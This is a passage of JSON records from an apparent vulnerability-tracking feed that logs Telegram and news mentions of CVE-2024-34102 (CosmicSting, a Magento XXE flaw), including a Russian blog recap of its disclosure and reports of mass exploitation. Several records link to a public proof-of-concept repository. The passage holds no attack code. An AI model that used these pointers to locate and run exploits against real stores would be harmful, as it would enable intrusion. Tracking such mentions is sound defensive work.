\u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u043c UEFI\nPhoenix SecureCore \u0441\u0442\u0430\u0432\u0438\u0442 \u043f\u043e\u0434 \u0443\u0433\u0440\u043e\u0437\u0443 \u0441\u043e\u0442\u043d\u0438 \u043c\u043e\u0434\u0435\u043b\u0435\u0439 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u0432 Acer, Dell, Lenovo\u00a0 \u0438 HP. \u041b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0439 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0438 \u0434\u0430\u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043a\u043e\u0434 \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 UEFI. \u041e \u0432\u044b\u043f\u0443\u0441\u043a\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0434\u043b\u044f\u00a0 CVE-2024-0762 (CVSS 7.5) \u043f\u043e\u043a\u0430 \u043e\u0431\u044a\u044f\u0432\u0438\u043b\u0430 \u0442\u043e\u043b\u044c\u043a\u043e Lenovo. \n\n#\u043d\u043e\u0432\u043e\u0441\u0442\u0438 #APT #\u0434\u0430\u0439\u0434\u0436\u0435\u0441\u0442 @\u041f2\u0422", "creation_timestamp": "2024-06-24T14:58:52.000000Z"}, {"uuid": "bd824ec4-879e-4514-90a7-5eb7ab7b1987", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/33944", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-09-03T20:11:30.000000Z"}, {"uuid": "ceb9ba46-e641-438b-8058-77f463fc84b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/41AOwW-HVfveJGnWTCUGJmCb5QTVwo4WGVTDiWBY6ulqpQ", "content": "", "creation_timestamp": "2024-08-01T20:58:08.000000Z"}, {"uuid": "d722d5b3-6951-4aa2-b92b-4890e07088a1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/2Ubj45-CL0GpfjVJ064iydeyB5QDNcFMhwT-fj-fWEk-R_Q", "content": "", "creation_timestamp": "2024-07-10T04:50:59.000000Z"}, {"uuid": "5ef76e05-257c-4d6d-8c8e-47b91ab9ff95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/h9mr31iHViKJhiSIoWcoJWN_If1njkgW5N_RzsEqeg48wRE", "content": "", "creation_timestamp": "2024-07-08T12:32:37.000000Z"}, {"uuid": "e54c3c0b-5321-47a0-9d8c-6ba41e1875d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/34671", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-09-04T15:58:16.000000Z"}, {"uuid": "5d20aeaa-ad63-4fb2-a2b4-fd63eefce36a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "seen", "source": "Telegram/Qx13XGaSyEDbvSkCnYEOyF6wnlnfeQzyysxva6SvFfcI2A", "content": "", "creation_timestamp": "2024-10-02T17:43:01.000000Z"}, {"uuid": "18ee3215-c1a7-4de5-b943-3118b5292239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/TheDarkWebInformer/1488", "content": "\ud83d\udea8PoC RELEASED\ud83d\udea8POC for CVE-2024-34102. A pre-authentication XML entity injection issue in Magento / Adobe Commerce.\n\nhttps://x.com/DarkWebInformer/status/1806716603989459310\n\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-06-28T17:50:34.000000Z"}, {"uuid": "14d728e3-7c67-43a1-b23b-4e32d5b9df3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/sycebrex/188", "content": "\u041f\u0430\u0442\u0447\u0438\u043d\u0433 \u0438\u0437 \u0433\u043e\u0432\u043d\u0430 \u0438 \u043f\u0430\u043b\u043e\u043a \u043f\u0440\u0438\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0439 \u0441\u043b\u0430\u0431\u043e\u0443\u043c\u0438\u0435\u043c \u0438 \u043e\u0442\u0432\u0430\u0433\u043e\u0439\n\n\u041f\u043e\u043a\u0430 \u041c\u043e\u0441\u043a\u0432\u0430 \u043f\u043b\u0430\u0432\u0438\u0442\u0441\u044f, \u043a\u0430\u043a \u0441\u043b\u0438\u0432\u043e\u0447\u043d\u043e\u0435 \u043c\u0430\u0441\u043b\u043e, \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0432\u0430\u043c \u0437\u0430\u043d\u044f\u0442\u043d\u0443\u044e \u0438\u0441\u0442\u043e\u0440\u0438\u044e \u043f\u0440\u043e \u043c\u043e\u0435\u0433\u043e \u0434\u0440\u0443\u0433\u0430 \u0421\u0435\u0440\u0435\u0433\u0443, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u044f \u0440\u0435\u0433\u0443\u043b\u044f\u0440\u043d\u043e \u0442\u0443\u0442 \u0443\u043f\u043e\u043c\u044f\u043d\u0430\u044e. \u041a\u0441\u0442\u0430\u0442\u0438, \u0435\u0441\u043b\u0438 \u043a\u0442\u043e \u043e\u0442\u0433\u0430\u0434\u0430\u0435\u0442 \u043e\u0442\u043a\u0443\u0434\u0430 \u0435\u0433\u043e \u043d\u0438\u043a Spacewasp - \u043f\u0440\u0438\u0448\u043b\u044e \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043c\u0435\u0440\u0447\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e. \u042f \u0443\u0436\u0435 \u0442\u0430\u043a \u0434\u0435\u043b\u0430\u043b \u0440\u0430\u043d\u044c\u0448\u0435, \u0431\u0435\u0437 \u0448\u0443\u0442\u043e\u0447\u0435\u043a.\n\n\u0421\u0435\u0440\u0435\u0433\u0430 \u043e\u0447\u044c \u043a\u0440\u0443\u0442\u043e\u0439 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u0438 \u0432 \u0441\u0432\u043e\u0431\u043e\u0434\u043d\u043e\u0435 \u0432\u0440\u0435\u043c\u044f \u0431\u0430\u043b\u0443\u0435\u0442\u0441\u044f \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u044f\u043c\u0438. \u0412 \u043a\u043e\u043d\u0446\u0435 2023 \u0433\u043e\u0434\u0430 \u043e\u043d \u043d\u0430\u0448\u0435\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Magento. \u042d\u0442\u043e \u043e\u0445\u0440\u0435\u043d\u0435\u0442\u044c \u043a\u0430\u043a\u043e\u0435 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0435 \u0440\u0435\u0448\u0435\u043d\u0438\u0435 \u043e\u0442 Adobe \u0434\u043b\u044f eCommerce. \u041a\u0430\u043a \u043f\u0438\u0448\u0443\u0442 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442\u044b, \u041c\u0430\u0433\u0435\u043d\u0442\u043e\u0439 \u043e\u043a\u0443\u0447\u0435\u043d\u043e \u0434\u043e 38% \u043e\u043d\u043b\u0430\u0439\u043d \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u043c\u0430\u0433\u0430\u0437\u0438\u043d\u043e\u0432. \n\n\u0421\u0435\u0440\u0435\u0433\u0430 \u043d\u0430\u0448\u0435\u043b XXE (XML external entity attack), \u0437\u0430\u0440\u0435\u043f\u043e\u0440\u0442\u0438\u043b \u0432 \u0431\u0430\u0433\u0431\u0430\u0443\u043d\u0442\u0438 \u0447\u0435\u0440\u0435\u0437 HackerOne. \u0422\u0430\u0439\u043c\u0438\u043d\u0433 \u0442\u0443\u0442 \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u0435\u0442 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f: \n\ud83d\uddff\u0437\u0430\u0440\u0435\u043f\u043e\u0440\u0442\u0438\u043b 20 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2023\n\ud83d\uddff\u0410\u0434\u043e\u0431 \u043f\u0440\u0438\u043d\u044f\u043b \u0431\u0430\u0433\u0443 8 \u044f\u043d\u0432\u0430\u0440\u044f 2024\n\ud83d\uddff\u0431\u0430\u0431\u043a\u0438 \u0432\u044b\u043f\u043b\u0430\u0442\u0438\u043b\u0438 21 \u043c\u0430\u044f 2024 (9000 \u0431\u0430\u043a\u0441\u043e\u0432; \u043d\u0430 \u043c\u043e\u0439 \u0441\u0443\u0431\u044a\u0435\u043a\u0442\u0438\u0432\u043d\u044b\u0439 \u0432\u0437\u0433\u043b\u044f\u0434 \u044d\u0442\u043e \u043c\u0430\u043b\u043e \u0434\u043b\u044f \u0442\u0430\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u0438\u043c\u043f\u0430\u043a\u0442\u0430 \u0438 \u043f\u0440\u043e\u0447\u0438\u0445 \u0432\u0430\u0436\u043d\u044b\u0445 \u0434\u0435\u0442\u0430\u043b\u0435\u0439, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0410\u0434\u043e\u0431 \u044f\u0432\u043d\u043e \u043d\u0435\u0434\u043e\u043e\u0446\u0435\u043d\u0438\u043b)\n\ud83d\uddff\u0444\u0438\u043a\u0441 \u0437\u0430\u043f\u0443\u0448\u0438\u043b\u0438 \u0438 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 CVE-2024-34102 11 \u0438\u044e\u043d\u044f 2024\n\n\u0424\u0438\u043a\u0441 - \u041a\u041e\u0420\u042f\u0412\u042b\u0419 (\u043e\u0447\u0435\u043d\u044c \u0432\u0430\u0436\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442, \u0434\u0435\u0442\u0430\u043b\u0435\u0439 \u0440\u0430\u0441\u043a\u0440\u044b\u0432\u0430\u0442\u044c \u043d\u0435 \u0431\u0443\u0434\u0443). \u0418 \u0432 \u0446\u0435\u043b\u043e\u043c \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0438 \u0441 \u0410\u0434\u043e\u0431\u043e\u043c \u0431\u044b\u043b\u0438 \u043d\u0435 \u0448\u0438\u0431\u043a\u043e \u043f\u0440\u043e\u0437\u0440\u0430\u0447\u043d\u044b\u0435, \u043a\u0430\u043a \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b \u043f\u043e\u0437\u0436\u0435 \u0421\u0435\u0440\u0435\u0433\u0430. \u042d\u0442\u043e \u0431\u044b\u043b \u043f\u0435\u0440\u0432\u044b\u0439 \u0430\u043a\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043d\u0430\u0437\u044b\u0432\u0430\u0435\u0442\u0441\u044f \"\u041f\u0430\u0442\u0447\u0438\u043d\u0433 \u0438\u0437 \u0433\u043e\u0432\u043d\u0430 \u0438 \u043f\u0430\u043b\u043e\u043a\". \u041f\u0435\u0440\u0435\u0445\u043e\u0434\u0438\u043c \u043a\u043e \u0432\u0442\u043e\u0440\u043e\u043c\u0443 - \"\u0421\u043b\u0430\u0431\u043e\u0443\u043c\u0438\u0435 \u0438 \u043e\u0442\u0432\u0430\u0433\u0430\".\n\n\u0412\u043d\u0435\u0437\u0430\u043f\u043d\u043e \u043d\u0430 \u0441\u0446\u0435\u043d\u0443 \u0432\u0440\u044b\u0432\u0430\u0435\u0442\u0441\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0430\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u0430 Sansec \u0443\u0432\u0438\u0434\u0435\u043b\u0430 \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e CVE-2024-34102, \u0431\u044b\u0441\u0442\u0440\u043e \u043f\u0440\u043e\u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u043a\u043e\u0440\u044f\u0432\u044b\u0439 \u0444\u0438\u043a\u0441 \u043e\u0442 \u0410\u0434\u043e\u0431\u0430 \u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0430 \u0441\u0442\u0430\u0442\u044c\u044e\u00a0\u0438 \u0412\u041d\u0415\u0417\u0410\u041f\u041d\u041e \u0441\u0434\u0435\u043b\u0430\u043b\u0430 \u0434\u0432\u0435 \u0432\u0435\u0449\u0438: \u0445\u043e\u0440\u043e\u0448\u0443\u044e - \u043e\u043d\u0438 \u0434\u0430\u043b\u0438 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CosmicSting; \u0438 \u043f\u043b\u043e\u0445\u0443\u044e - \u043e\u043d\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438, \u043f\u043e \u0441\u0443\u0442\u0438, \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 (\u0432\u0441\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u043c \u043a\u043e\u0440\u044f\u0432\u044b\u0439 \u043f\u0430\u0442\u0447 \u043e\u0442 \u0410\u0434\u043e\u0431). Sansec \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0438\u043b\u0438 \u0441\u0432\u043e\u0439 Emergency Fix, \u043d\u043e \u043e\u043d \u0431\u044b\u043b \u043d\u0430 \u0441\u0442\u043e\u043b\u044c\u043a\u043e Emergency, \u0447\u0442\u043e \u043e\u0431\u0445\u043e\u0434\u0438\u043b\u0441\u044f \u044d\u043d\u043a\u043e\u0434\u0438\u043d\u0433\u043e\u043c \u0432\u0445\u043e\u0434\u043d\u043e\u0433\u043e JSON. \u0418, \u0441\u044e\u0440\u043f\u0440\u0438\u0437-\u0441\u044e\u0440\u043f\u0440\u0438\u0437, \u0447\u0443\u0432\u0430\u043a\u0438 \u0438\u0437 Hypernode\u00a0\u0443\u0436\u0435 27 \u0438\u044e\u043d\u044f \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438, \u0447\u0442\u043e \u0443\u0436\u0435 \u0444\u0438\u043a\u0441\u0438\u0440\u0443\u044e\u0442 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \u042d\u0442\u0430 \u0431\u0430\u0433\u0430 \u0432\u043c\u0435\u0441\u0442\u0435 \u0441 CVE-2024-2961 \u0434\u0430\u0435\u0442 \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430. \u0410 \u044d\u0442\u043e \u043e\u0447\u0435\u043d\u044c \u0433\u0440\u0443\u0441\u0442\u043d\u043e. \u0422\u0430\u043a\u043e\u0439 \u0440\u0430\u0441\u043a\u043b\u0430\u0434, \u0441\u0443\u0434\u044f \u043f\u043e \u0432\u0441\u0435\u043c\u0443, \u0440\u0430\u0441\u0441\u0442\u0440\u043e\u0438\u043b \u0410\u0434\u043e\u0431 \u0438, \u043e \u0431\u043e\u0433\u0438, \u043e\u043d\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u043f\u0430\u0442\u0447\u00a0\u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438. \n\n\u0422\u0443\u0442 \u044f \u0438\u0441\u043a\u0440\u043d\u0435\u043d\u043d\u0435 \u043c\u043e\u0433\u0443 \u043f\u043e\u0437\u0434\u0440\u0430\u0432\u0438\u0442\u044c \u0421\u0435\u0440\u0435\u0433\u0443 \u0441 \"\u0438\u043c\u0435\u043d\u043d\u043e\u0439\" \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e. \u042d\u0442\u043e \u043a\u043b\u0430\u0441\u0441\u043d\u0430\u044f \u0430\u0447\u0438\u0432\u043a\u0430. \u0410 \u0435\u0449\u0435 \u0443 \u043d\u0435\u0433\u043e \u0445\u043e\u0440\u043e\u0448\u0435\u0435 \u0442\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0431\u0435\u0437 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u0438\u044f \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0435\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438", "creation_timestamp": "2024-07-04T19:47:41.000000Z"}, {"uuid": "381ff797-6cc7-4e10-a78f-3d97cd5e4af4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/97572", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-09-03T20:11:28.000000Z"}, {"uuid": "ad235fab-d219-49d6-923e-7638edcb9d49", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/LockBitChannels/98299", "content": "PoC PUBLISHEDPOC for CVE-2024-34102. Pre-authentication XML entity injection issue in Magento/Adobe Commerce.\n\nGIT:\nhttps://github.com/bigb0x/CVE-2024-34102", "creation_timestamp": "2024-09-04T15:58:19.000000Z"}, {"uuid": "768dfc5a-a011-4f73-aa46-656f76ffa9c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/HackingInsights/6178", "content": "\u200aCritical Magento Flaw Exploited: CosmicSting (CVE-2024-34102) Strikes Global Brands\n\nhttps://securityonline.info/critical-magento-flaw-exploited-cosmicsting-cve-2024-34102-strikes-global-brands/", "creation_timestamp": "2024-07-16T13:12:03.000000Z"}, {"uuid": "809da205-07c3-45c3-a125-f05dbcff69c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "https://t.me/HackingInsights/3235", "content": "\u200aCosmicSting (CVE-2024-34102): A Critical E-Commerce Vulnerability Threatening Millions of Online Stores\n\nhttps://securityonline.info/cosmicsting-cve-2024-34102-a-critical-e-commerce-vulnerability-threatening-millions-of-online-stores/", "creation_timestamp": "2024-06-21T14:20:32.000000Z"}, {"uuid": "b01187bc-aa98-4a03-b830-ad0b7f6559f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/Fs02ZGushbLVyZ8by1UjMazhLjzbCr7XKpsIdTFmFNeqgm51", "content": "", "creation_timestamp": "2024-06-25T23:45:30.000000Z"}, {"uuid": "c3d19074-e5e8-46a5-8ffb-34f023d73824", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/uowCYZvXY-y3Nn8afA5axlYI7-4JTGSdpVQN4kOHeESeGMFz", "content": "", "creation_timestamp": "2025-01-18T21:51:25.000000Z"}, {"uuid": "98bc1270-9c02-4167-9f91-c79973dd2a4a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/snl5FqqADmgXAs5c05vVy-NgzeYwNmslV-ygfqE2oMbwd6TA", "content": "", "creation_timestamp": "2025-01-07T04:56:10.000000Z"}, {"uuid": "a65c4ad2-403b-42cd-a039-82ac99fc4b59", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/rC2nj9j-WuLUAq6_z8Z0Y0U-HA5W5lKPt58F9aQUPvxZOcFq", "content": "", "creation_timestamp": "2025-01-13T00:37:35.000000Z"}, {"uuid": "4a2ff271-7f0f-4881-b4fc-3f08e83c4d24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/yiCODHQlFjxfYkj79wOjjwANVY-mMr2kt7X6aAV4K49AIEku", "content": "", "creation_timestamp": "2024-12-20T09:14:05.000000Z"}, {"uuid": "f9b8a3c0-4e0f-48bf-a707-32ecaa854206", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/DfmU93LE3AozuWJMqcrC-rPqX1XZ0E4j79xp5Ff81u1b_6k", "content": "", "creation_timestamp": "2024-07-10T04:52:22.000000Z"}, {"uuid": "94ed94ed-3ee7-413e-b904-e2fb737c9340", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/WqjhbM72U4ocbMTfepAnwsydt2c0ofycAvLoPo6MfZu6J-E", "content": "", "creation_timestamp": "2024-09-03T20:09:14.000000Z"}, {"uuid": "88c1386a-a3ef-4270-9cd2-a3ffca65b4a9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/En5bWlCeSQigL_4iwQdRs6kqLH8TRpO_VuIDNnsYMXtpCqU", "content": "", "creation_timestamp": "2024-09-04T15:58:49.000000Z"}, {"uuid": "cebef553-26e0-470e-a34e-c838b827bebe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/aCSD0HLEv39Ulk_hujW0lLPp9c1Oi-Eg-MiHwW67wkGt3eE", "content": "", "creation_timestamp": "2024-07-08T12:32:34.000000Z"}, {"uuid": "6e23afe2-59c9-4fb2-a577-32871da4270d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "exploited", "source": "https://t.me/tengkorakcybercrewz/22529", "content": "The Hacker News\nAlert: Adobe Commerce and Magento Stores Under Attack from CosmicSting Exploit\n\nCybersecurity researchers have disclosed that 5% of all Adobe Commerce and Magento stores have been hacked by malicious actors by exploiting a security vulnerability dubbed CosmicSting.\nTracked as CVE-2024-34102 (CVSS score: 9.8), the critical flaw relates to an improper restriction of XML external entity reference (XXE) vulnerability that could result in remote code execution. The shortcoming,", "creation_timestamp": "2024-10-02T17:43:02.000000Z"}, {"uuid": "b0698134-d72c-4829-a772-39998532302b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/0S0LSUkLMN0lw7bP5ROpZW7w2UICDe17ksBOo5rOUETNVZo", "content": "", "creation_timestamp": "2024-09-03T20:09:17.000000Z"}, {"uuid": "3385e965-ec51-48a2-868e-123871a9ae9d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/MXDY_kR-gt7Jn0TvQ3noyt3THT0L5yqKL2KKreb92EoMfDk", "content": "", "creation_timestamp": "2024-07-08T12:32:34.000000Z"}, {"uuid": "f46ee2fa-444e-43a0-a4d6-8e02a3e34c48", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/Z16takdtR4pNaV_lmhXzlf8hO1RSp8oNh55fo18IuWtj9YU", "content": "", "creation_timestamp": "2024-09-04T15:58:52.000000Z"}, {"uuid": "b11d1a6c-2a3c-479f-92b1-ef351010c555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/MgEw2e-_UFYKY5YWSut-fUE0Muwvoy6ewDv4klR_I2HM_QA", "content": "", "creation_timestamp": "2024-07-10T04:52:23.000000Z"}, {"uuid": "8d0f22a5-a6d2-4fb6-8de8-e623d32c7ff2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/OGKojK_kdyncbUUFPkZADCMHv3r46ibnChVJsI5me0csrmiW", "content": "", "creation_timestamp": "2025-01-13T00:37:32.000000Z"}, {"uuid": "2126599a-d554-4a9a-b5ca-9be6c120e27d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/ffNKdhpRDqhw9ZXqNKSsCNCJgmnYXA69PRHPjC-NKHiD3RBI", "content": "", "creation_timestamp": "2024-12-20T09:14:02.000000Z"}, {"uuid": "8b85d002-469c-4d9d-a2a1-53965882294f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": "Telegram/GmyYBu2OWwfvkdJ88UCkGTEeu0OCGBjjpO-jjbG_y6ygXSDI", "content": "", "creation_timestamp": "2025-01-18T21:51:21.000000Z"}, {"uuid": "b17d57d1-1237-4e9b-a0d1-39653bd344ef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2024-34102", "type": "published-proof-of-concept", "source": 